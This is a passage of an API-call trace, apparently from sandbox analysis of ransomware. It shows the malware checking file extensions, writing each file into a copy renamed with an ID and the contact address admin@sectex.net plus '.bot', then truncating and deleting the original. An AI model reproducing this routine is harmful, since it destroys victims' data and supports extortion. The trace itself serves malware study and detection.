	[0043.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.818] lstrlenW (lpString=".1cd") returned 4
	[0043.818] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.818] lstrlenW (lpString=".jpg") returned 4
	[0043.818] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.818] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.818] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.819] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1347) returned 1
	[0043.819] CloseHandle (hObject=0x1a8) returned 1
	[0043.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 0x20
	[0043.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.819] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.819] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.398] GetLastError () returned 0x0
	[0044.398] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x543, lpOverlapped=0x0) returned 1
	[0044.401] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0044.402] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.402] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.402] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.402] CloseHandle (hObject=0x1f4) returned 1
	[0044.402] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.402] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.403] CloseHandle (hObject=0x1a8) returned 1
	[0044.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.403] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 1
	[0044.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.404] lstrlenW (lpString=".doc") returned 4
	[0044.404] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.404] lstrlenW (lpString=".docx") returned 5
	[0044.404] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.404] lstrlenW (lpString=".pdf") returned 4
	[0044.404] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.404] lstrlenW (lpString=".xls") returned 4
	[0044.404] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.404] lstrlenW (lpString=".xlsx") returned 5
	[0044.404] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.404] lstrlenW (lpString=".ppt") returned 4
	[0044.404] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.404] lstrlenW (lpString=".zip") returned 4
	[0044.404] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.404] lstrlenW (lpString=".rar") returned 4
	[0044.404] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.404] lstrlenW (lpString=".bz2") returned 4
	[0044.404] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.404] lstrlenW (lpString=".7z") returned 3
	[0044.404] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.405] lstrlenW (lpString=".dbf") returned 4
	[0044.405] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.405] lstrlenW (lpString=".1cd") returned 4
	[0044.405] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.405] lstrlenW (lpString=".jpg") returned 4
	[0044.405] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.405] lstrlenW (lpString=".doc") returned 4
	[0044.405] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.405] lstrlenW (lpString=".docx") returned 5
	[0044.405] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.405] lstrlenW (lpString=".pdf") returned 4
	[0044.405] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.405] lstrlenW (lpString=".xls") returned 4
	[0044.405] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.405] lstrlenW (lpString=".xlsx") returned 5
	[0044.405] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.405] lstrlenW (lpString=".ppt") returned 4
	[0044.405] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.405] lstrlenW (lpString=".zip") returned 4
	[0044.405] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.405] lstrlenW (lpString=".rar") returned 4
	[0044.405] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.405] lstrlenW (lpString=".bz2") returned 4
	[0044.405] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.405] lstrlenW (lpString=".7z") returned 3
	[0044.405] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.405] lstrlenW (lpString=".dbf") returned 4
	[0044.405] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.406] lstrlenW (lpString=".1cd") returned 4
	[0044.406] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72
	[0044.406] lstrlenW (lpString=".jpg") returned 4
	[0044.406] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.406] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.406] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.406] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.406] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1232) returned 1
	[0044.406] CloseHandle (hObject=0x1a8) returned 1
	[0044.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 0x20
	[0044.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.407] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.407] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.407] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.407] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.411] GetLastError () returned 0x0
	[0044.411] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x4d0, lpOverlapped=0x0) returned 1
	[0044.413] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x4e0, lpOverlapped=0x0) returned 1
	[0044.414] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.414] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.414] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.414] CloseHandle (hObject=0x1f4) returned 1
	[0044.414] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.415] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.415] CloseHandle (hObject=0x1a8) returned 1
	[0044.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.416] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 1
	[0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.416] lstrlenW (lpString=".doc") returned 4
	[0044.416] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.416] lstrlenW (lpString=".docx") returned 5
	[0044.416] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.416] lstrlenW (lpString=".pdf") returned 4
	[0044.416] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.416] lstrlenW (lpString=".xls") returned 4
	[0044.416] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.416] lstrlenW (lpString=".xlsx") returned 5
	[0044.416] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.416] lstrlenW (lpString=".ppt") returned 4
	[0044.416] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.416] lstrlenW (lpString=".zip") returned 4
	[0044.416] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.416] lstrlenW (lpString=".rar") returned 4
	[0044.416] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.416] lstrlenW (lpString=".bz2") returned 4
	[0044.416] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.416] lstrlenW (lpString=".7z") returned 3
	[0044.416] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.416] lstrlenW (lpString=".dbf") returned 4
	[0044.416] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.417] lstrlenW (lpString=".1cd") returned 4
	[0044.417] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.417] lstrlenW (lpString=".jpg") returned 4
	[0044.417] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.417] lstrlenW (lpString=".doc") returned 4
	[0044.417] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.417] lstrlenW (lpString=".docx") returned 5
	[0044.417] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.417] lstrlenW (lpString=".pdf") returned 4
	[0044.417] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.417] lstrlenW (lpString=".xls") returned 4
	[0044.417] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.417] lstrlenW (lpString=".xlsx") returned 5
	[0044.417] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.417] lstrlenW (lpString=".ppt") returned 4
	[0044.417] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.417] lstrlenW (lpString=".zip") returned 4
	[0044.417] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.417] lstrlenW (lpString=".rar") returned 4
	[0044.417] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.417] lstrlenW (lpString=".bz2") returned 4
	[0044.417] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.417] lstrlenW (lpString=".7z") returned 3
	[0044.417] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.417] lstrlenW (lpString=".dbf") returned 4
	[0044.417] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.417] lstrlenW (lpString=".1cd") returned 4
	[0044.418] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75
	[0044.418] lstrlenW (lpString=".jpg") returned 4
	[0044.418] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.418] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.418] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.418] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=18413) returned 1
	[0044.418] CloseHandle (hObject=0x1a8) returned 1
	[0044.418] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 0x20
	[0044.418] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.418] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.419] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.419] GetLastError () returned 0x0
	[0044.419] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x47ed, lpOverlapped=0x0) returned 1
	[0044.422] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x47f0, lpOverlapped=0x0) returned 1
	[0044.423] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.423] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.423] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.423] CloseHandle (hObject=0x1f4) returned 1
	[0044.423] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.423] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.424] CloseHandle (hObject=0x1a8) returned 1
	[0044.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.424] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 1
	[0044.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.425] lstrlenW (lpString=".doc") returned 4
	[0044.425] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.425] lstrlenW (lpString=".docx") returned 5
	[0044.425] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.425] lstrlenW (lpString=".pdf") returned 4
	[0044.425] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.425] lstrlenW (lpString=".xls") returned 4
	[0044.425] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.425] lstrlenW (lpString=".xlsx") returned 5
	[0044.425] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.425] lstrlenW (lpString=".ppt") returned 4
	[0044.425] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.425] lstrlenW (lpString=".zip") returned 4
	[0044.425] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.425] lstrlenW (lpString=".rar") returned 4
	[0044.425] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.425] lstrlenW (lpString=".bz2") returned 4
	[0044.425] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.425] lstrlenW (lpString=".7z") returned 3
	[0044.425] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.425] lstrlenW (lpString=".dbf") returned 4
	[0044.425] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.425] lstrlenW (lpString=".1cd") returned 4
	[0044.425] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.425] lstrlenW (lpString=".jpg") returned 4
	[0044.425] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.426] lstrlenW (lpString=".doc") returned 4
	[0044.426] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.426] lstrlenW (lpString=".docx") returned 5
	[0044.426] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.426] lstrlenW (lpString=".pdf") returned 4
	[0044.426] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.426] lstrlenW (lpString=".xls") returned 4
	[0044.426] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.426] lstrlenW (lpString=".xlsx") returned 5
	[0044.426] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.426] lstrlenW (lpString=".ppt") returned 4
	[0044.426] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.426] lstrlenW (lpString=".zip") returned 4
	[0044.426] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.426] lstrlenW (lpString=".rar") returned 4
	[0044.426] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
